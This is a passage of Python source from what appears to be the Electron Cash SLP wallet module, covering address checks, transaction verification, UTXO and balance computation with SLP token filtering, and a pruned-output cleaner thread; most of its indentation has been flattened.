        # scans of the address lists (which was the previous approach).
        # For small wallets it doesn't matter -- but for wallets with 5k or 10k
        # addresses, it starts to add up since is_mine() is called frequently,
        # especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
        '''Convenience method equivalent to Blockchain.get_hash(), except our
        version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
        """Effect of tx on address."""
        assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
        # subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
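        # Builds two maps from this address's history:
        #   received: "txid:n" -> (height, value, is_coinbase) for each output paying this address
        #   sent:     spent outpoint "txid:n" -> height of the transaction that spent it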
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method has been updated for SLP: it prevents token-bearing coins from
# being spent in normal transactions, or in token transactions whose token_id
# differs from the one specified.
def get_addr_utxo(self, address, *, exclude_slp = True):
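"""Return the unspent coins for `address` as a dict keyed by
'prevout_hash:prevout_n'; each value carries address, value, prevout info,
height, coinbase and frozen status. With exclude_slp=True (the default),
every SLP-carrying txo known to the wallet is omitted so token outputs
cannot be selected as ordinary BCH coins."""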
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin is not None:
txid, idx = coin[0].split(":")
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normal case: remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
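# Illustrative usage (a sketch; variable names are assumptions):
#   confirmed, unconfirmed, unmatured = wallet.get_addr_balance(addr)
#   total = confirmed + unconfirmed + unmatured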
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
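"""Return a 5-tuple of token quantities for `slpTokenId`:
(valid, unvalidated, invalid, unfrozen_valid, frozen_valid), where
frozen_valid is computed as valid - unfrozen_valid."""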
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
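# Illustrative usage (a sketch; variable names are assumptions):
#   addrs_with_coins = set()
#   spendable = wallet.get_utxos(exclude_frozen=True, mature=True,
#                                confirmed_only=False, addr_set_out=addrs_with_coins)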
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
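"""Return the total BCH (in satoshis) currently sitting in this wallet's
unspent SLP token outputs, i.e. value that is locked behind token-carrying
coins and excluded from normal coin selection."""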
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
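"""Register `tx` with the wallet: record its relevant inputs/outputs in
self.txi/self.txo, handle out-of-order arrival via the pruned_txo
mechanism, invalidate affected balance-cache entries, defer any Cash
Accounts registration, and finally hand the tx to handleSlpTransaction
for SLP bookkeeping. Takes self.lock internally."""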
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
